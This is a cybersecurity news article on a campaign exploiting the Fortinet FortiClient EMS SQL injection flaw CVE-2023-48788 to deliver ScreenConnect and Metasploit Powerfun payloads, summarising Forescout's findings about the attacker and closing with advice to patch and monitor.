Fortinet Flaw Exploited in New Cyberattack Campaign Involving ScreenConnect and Metasploit

April 17, 2024

A new cyberattack campaign has been discovered that exploits a security flaw, CVE-2023-48788, in Fortinet FortiClient EMS devices. The critical SQL injection flaw could allow an unauthenticated attacker to execute unauthorized code or commands. The campaign, monitored by cybersecurity firm Forescout under the codename Connect:fun, involves the delivery of ScreenConnect and Metasploit Powerfun payloads.

The targeted company, which operates in the media sector, had its vulnerable FortiClient EMS device exposed to the internet shortly after a proof-of-concept (PoC) exploit for the flaw was released on March 21, 2024. Over the next few days, the unidentified threat actor attempted to download ScreenConnect and install the remote desktop software using the msiexec utility, but was unsuccessful.

On March 25, the PoC exploit was used to execute PowerShell code that downloaded the Metasploit Powerfun script and initiated a reverse connection to another IP address. Additionally, SQL statements were observed attempting to download ScreenConnect from a remote domain ('ursketz[.]com') using certutil, which was then installed via msiexec before establishing a connection with a command-and-control (C2) server.

The threat actor behind the campaign, active since at least 2022, appears to specifically target Fortinet appliances and uses Vietnamese and German languages in their infrastructure. Security researcher Sai Molige noted, 'The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts. This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances.'

Forescout highlighted that the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788. Organizations are advised to apply patches provided by Fortinet to mitigate potential threats, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.